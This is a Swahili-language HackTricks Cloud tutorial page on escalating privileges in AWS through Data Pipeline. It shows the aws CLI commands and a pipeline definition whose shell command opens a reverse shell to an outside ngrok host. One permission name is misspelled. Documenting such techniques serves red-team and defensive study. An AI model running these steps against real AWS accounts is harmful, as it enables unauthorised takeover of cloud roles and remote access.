AWS - Datapipeline Privesc

Jifunze na zoezi la Udukuzi wa AWS:Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya AWS (ARTE) Jifunze na zoezi la Udukuzi wa GCP: Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya GCP (GRTE)

Support HackTricks

Angalia mpango wa michango!
Jiunge na 💬 kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

datapipeline

Kwa habari zaidi kuhusu datapipeline angalia:

AWS - DataPipeline, CodePipeline & CodeCommit Enum

`iam:PassRole`, `datapipeline:CreatePipeline`, `datappipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`

Watumiaji wenye ruhusa hizi wanaweza kuongeza mamlaka kwa kujenga Data Pipeline kutekeleza amri za kupindukia kutumia ruhusa za jukumu lililopewa:

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

Baada ya uundaji wa mabomba, mshambuliaji anasasisha ufafanuzi wake ili kuamuru hatua maalum au uundaji wa rasilimali:

{
"objects": [
{
"id" : "CreateDirectory",
"type" : "ShellCommandActivity",
"command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn" : {"ref": "instance"}
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id" : "instance",
"name" : "instance",
"type" : "Ec2Resource",
"actionOnTaskFailure" : "terminate",
"actionOnResourceFailure" : "retryAll",
"maximumRetries" : "1",
"instanceType" : "t2.micro",
"securityGroups" : ["default"],
"role" : "assumable_datapipeline",
"resourceRole" : "assumable_ec2_profile_instance"
}]
}

Tafadhali kumbuka kuwa jukumu katika mstari wa 14, 15 na 27 inahitaji kuwa jukumu linaloweza kuchukuliwa na datapipeline.amazonaws.com na jukumu katika mstari wa 28 inahitaji kuwa jukumu linaloweza kuchukuliwa na ec2.amazonaws.com na kielelezo cha EC2.

Zaidi ya hayo, kielelezo cha EC2 kitakuwa na ufikiaji tu kwa jukumu linaloweza kuchukuliwa na kielelezo cha EC2 (hivyo unaweza kuiba hicho tu).

aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
--pipeline-definition file:///pipeline/definition.json

Faili la ufafanuzi wa mabomba, lililoundwa na mshambuliaji, linaelekeza kutekeleza amri au kuunda rasilimali kupitia AWS API, kwa kutumia ruhusa za jukumu la Data Pipeline ili kupata mamlaka ya ziada.

Athari Inayowezekana: Privesc moja kwa moja kwa jukumu la huduma ya ec2 lililoelezwa.

Marejeo

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

Jifunze & zoezi la Udukuzi wa AWS:Mafunzo ya HackTricks AWS Red Team Expert (ARTE) Jifunze & zoezi la Udukuzi wa GCP: Mafunzo ya HackTricks GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa michango!
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

PreviousAWS - Cognito Privesc NextAWS - Directory Services Privesc

Last updated 1 month ago

datapipeline

iam:PassRole, datapipeline:CreatePipeline, datappipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

Marejeo

`iam:PassRole`, `datapipeline:CreatePipeline`, `datappipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`